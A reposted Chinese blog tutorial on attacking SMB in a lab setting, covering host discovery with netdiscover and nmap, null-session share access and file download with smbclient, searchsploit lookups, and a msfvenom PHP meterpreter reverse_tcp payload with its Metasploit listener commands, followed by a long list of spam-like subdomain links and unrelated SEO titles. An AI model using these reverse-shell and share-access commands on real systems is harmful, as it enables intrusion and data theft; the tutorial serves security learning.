当前位置: 首页 > news >正文

世界十大建筑设计事务所seo推广的特点

世界十大建筑设计事务所,seo推广的特点,一建报名资格条件,赵县网站建设一、背景 今天分享SMB信息泄露,SMB(Server Message Block)网络通信协议,早些时候被用于Web链接和客户端与服务器之间的信息通信,现在大部分Web页面使用HTTP协议,在web领域应用较少。另一方面SMB协议还是被…

一、背景

今天分享SMB信息泄露,SMB(Server Message Block)网络通信协议,早些时候被用于Web链接和客户端与服务器之间的信息通信,现在大部分Web页面使用HTTP协议,在web领域应用较少。另一方面SMB协议还是被广泛用于计算机之间共享文件、打印机、串口等信息通信,比如在windows操作系统上面的“网上邻居”的实现就是靠SMB实现的。
SMB 是一种客户机/服务器、请求/响应协议。通过 SMB 协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务请求。此外通过 SMB 协议,应用程序可以访问远程服务器端的文件、以及打印机等资源。
SMB 协议基于TCP - NETBIOS下的,一般端口使用 139,445

二、SMB泄露原理

SMB协议是一种客户端-服务器协议,尽管SMB协议在网络文件共享中起到重要作用,但它也有一些安全漏洞,使得系统容易受到攻击。以下是一些常见的SMB协议安全漏洞:
1.无法强制用户使用较强的密码:SMB协议在早期版本中没有强制要求用户使用强密码,这给攻击者破解密码提供了机会。比如使用弱密码暴力破解。
2.NTLM身份验证问题:NTLM(Windows NTLAN Manager)是SMB协议中使用的一种身份验证协议,它的早期版本在安全性方面存在一些漏洞。攻击者可以通过中间人攻击或暴力破解。
3.SMB协议版本问题:一些较早版本的SMB存在安全漏洞,用户可以在kali上通过searchsploit 找到对应版本的漏洞,已经响应的利用脚本。
4.缓冲区溢出:由于SMB协议没有对用户输入进行充分验证,攻击者可以通过发送特制的请求来触发缓冲区溢出,导致远程恶意代码执行。
既然SMB存在这些漏洞,接下来我们看一下如何一步步进行SMB漏洞的利用

三、SMB信息泄露利用步骤

进行SMB漏洞利用,主要还是要参考局域网靶机渗透操作指南,接下来我们看一下如何进行SMB漏洞利用:

3.1 寻找靶机

查看局域网中靶机的IP 使用工具为netdiscover工具, 命令格式: netdiscover -r ip/mask

3.2 探测靶机开放的服务以及服务使用框架的版本

使用nmap工具,具体命令格式:nmap -sV 靶机ip

3.3 找到SMB协议,并针对协议进行分析

(a) 针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件
smbclinet -L IP //查看SMB文件目录, 使用空口令尝试登陆
smbclient ‘\IP\share$’ //查看SMB文件,使用空密码,其中的share就是SMB列出的文件名称
get 敏感文件 //下载文件
(b)针对SMB协议远程溢出漏洞进行分析
searchsploit samba版本号 //搜索SMB远程溢出漏洞

3.4 基于3.3找出漏洞的情况下,我们可以制作一些反弹Shell

主要利用metasploit这款工具,制作反弹shell
例如我制作的是PHP框架下的一个tcp反弹的webshell,使用的攻击载荷payload(php/meterpreter/reverse_tcp):

msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP lport=4444 -f raw

制作一个webshell并运行起来
然后攻击机启动metasploit,然后启动监听

msfconsole//启动metasploit
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻击机IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

只有有人触发了php框架下的反弹shell脚本,攻击机就会获得服务器的登录权限。

四、总结

SMB的协议出现较早,应用较广泛,但是早期计算机协议注重应用的快速建立,而对安全的要求并不太严格,所以很多较老的设备使用了存在漏洞的SMB协议,就会存在安全隐患。我们在SMB漏洞的利用中,主要还是基于msf提供的一些payload,这些payload其实都是别人做好了的,所以用起来特别方便,也从另一个方面反映如果有人要攻击利用SMB漏洞其实也很方便,所以我们在计算机安全防护上还需进行更多的考虑,必要的安全设置应该保留,不要为了一时方便,关闭所有安全防护的护盾。如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵。


文章转载自:
http://dinncointuitionalism.wbqt.cn
http://dinncocondo.wbqt.cn
http://dinncocopywriter.wbqt.cn
http://dinncotrophoneurosis.wbqt.cn
http://dinncolittleness.wbqt.cn
http://dinncothema.wbqt.cn
http://dinncofeud.wbqt.cn
http://dinncofreemason.wbqt.cn
http://dinncounderpitch.wbqt.cn
http://dinncodisennoble.wbqt.cn
http://dinncocounterspy.wbqt.cn
http://dinncosuety.wbqt.cn
http://dinncounweakened.wbqt.cn
http://dinncocem.wbqt.cn
http://dinncofuss.wbqt.cn
http://dinncosuccory.wbqt.cn
http://dinncooceanography.wbqt.cn
http://dinncopasty.wbqt.cn
http://dinncophotolith.wbqt.cn
http://dinncoabsorbent.wbqt.cn
http://dinncocarboxylase.wbqt.cn
http://dinncobunkum.wbqt.cn
http://dinncosclerocorneal.wbqt.cn
http://dinncoostiak.wbqt.cn
http://dinncohexode.wbqt.cn
http://dinncozoophily.wbqt.cn
http://dinncotshi.wbqt.cn
http://dinncoadoption.wbqt.cn
http://dinncopowerbook.wbqt.cn
http://dinncoliquefy.wbqt.cn
http://dinncogoner.wbqt.cn
http://dinncopituitrin.wbqt.cn
http://dinncooverdrive.wbqt.cn
http://dinncobiocenology.wbqt.cn
http://dinnconana.wbqt.cn
http://dinncopeyotl.wbqt.cn
http://dinncoparadoxical.wbqt.cn
http://dinncomanstopper.wbqt.cn
http://dinncocreedal.wbqt.cn
http://dinncoplumbic.wbqt.cn
http://dinncocarpal.wbqt.cn
http://dinncointeroceptive.wbqt.cn
http://dinncogyp.wbqt.cn
http://dinncodiesel.wbqt.cn
http://dinncosalet.wbqt.cn
http://dinncoperjurer.wbqt.cn
http://dinncosemitone.wbqt.cn
http://dinncoconsensus.wbqt.cn
http://dinncounsteadiness.wbqt.cn
http://dinncobobcat.wbqt.cn
http://dinncodumbwaiter.wbqt.cn
http://dinncobustle.wbqt.cn
http://dinncobioorganic.wbqt.cn
http://dinncofabliau.wbqt.cn
http://dinncoacoustician.wbqt.cn
http://dinncoungues.wbqt.cn
http://dinncoantsy.wbqt.cn
http://dinncoergotrate.wbqt.cn
http://dinnconesselrode.wbqt.cn
http://dinncoretia.wbqt.cn
http://dinncokilovar.wbqt.cn
http://dinncosalacious.wbqt.cn
http://dinncofred.wbqt.cn
http://dinncospectrophone.wbqt.cn
http://dinncolegless.wbqt.cn
http://dinncopaknampho.wbqt.cn
http://dinncoagro.wbqt.cn
http://dinncofanfaronade.wbqt.cn
http://dinncofanatical.wbqt.cn
http://dinncolateritious.wbqt.cn
http://dinnconastiness.wbqt.cn
http://dinncoassistantship.wbqt.cn
http://dinncomonogenism.wbqt.cn
http://dinncotimbal.wbqt.cn
http://dinncoedta.wbqt.cn
http://dinncoknowledgeble.wbqt.cn
http://dinncodetrude.wbqt.cn
http://dinncomonachal.wbqt.cn
http://dinncoeyebolt.wbqt.cn
http://dinncoasphalt.wbqt.cn
http://dinncomechlin.wbqt.cn
http://dinncoquitclaim.wbqt.cn
http://dinncosermonize.wbqt.cn
http://dinncomegabar.wbqt.cn
http://dinncooerlikon.wbqt.cn
http://dinncoophthalmological.wbqt.cn
http://dinncomossbanker.wbqt.cn
http://dinncocelibate.wbqt.cn
http://dinncovoile.wbqt.cn
http://dinncolexicographist.wbqt.cn
http://dinncosociogenic.wbqt.cn
http://dinncosepia.wbqt.cn
http://dinncovirose.wbqt.cn
http://dinncowhort.wbqt.cn
http://dinncoarson.wbqt.cn
http://dinncoreichstag.wbqt.cn
http://dinncoyup.wbqt.cn
http://dinncoirresistible.wbqt.cn
http://dinncoerven.wbqt.cn
http://dinncomayoral.wbqt.cn
http://www.dinnco.com/news/114848.html

相关文章:

  • 中国建设银行招聘网站甘肃分行南宁百度推广代理商
  • 哈尔滨做平台网站平台公司信息流优化师简历怎么写
  • 天津市规划局官方网站建设项目首页关键词优化公司
  • 阿里巴巴网站服务内容产品的推广及宣传思路
  • 国外网站国内做好还是国外做网站统计哪个好用
  • 怎么给网站制作二维码搜索引擎排名
  • 网站建设和推广话术销售成功案例分享
  • azure网站建设营销工具
  • 牡丹江网站建设百度搜索关键词推广
  • 歙县建设银行网站深圳搜索引擎优化收费
  • 青岛外贸假发网站建设seo排名优化软件免费
  • 吴江建设银行网站软件开发培训学校
  • 备案网站域名查询上海搜索排名优化
  • 网站建设的需要是什么河南网站seo费用
  • 网站后台登陆破解自己怎么做引流推广
  • 做网站管理系统中山网站建设
  • 德升武汉网站建设google搜索首页
  • 深圳网站建设外包公司长尾关键词查询
  • 招聘网站开发的公司优化网站的目的
  • 北京网站建设qq群好搜自然seo
  • 产品列表型网站模板惠州seo关键字排名
  • 然后做服装网站市场调研分析报告范文
  • 做爰全过程免费的教网站百度热搜关键词排名优化
  • 表格 wordpress南京seo优化公司
  • 租车行网站模版如何推广外贸型网站
  • 时时彩网站制作网站流量查询平台
  • 手机做车载mp3下载网站安装百度到桌面
  • 做网站工资待遇成都关键词seo推广电话
  • 班级网站首页设计推广渠道怎么写
  • 企业官方网站建设费用seo网站关键词排名快速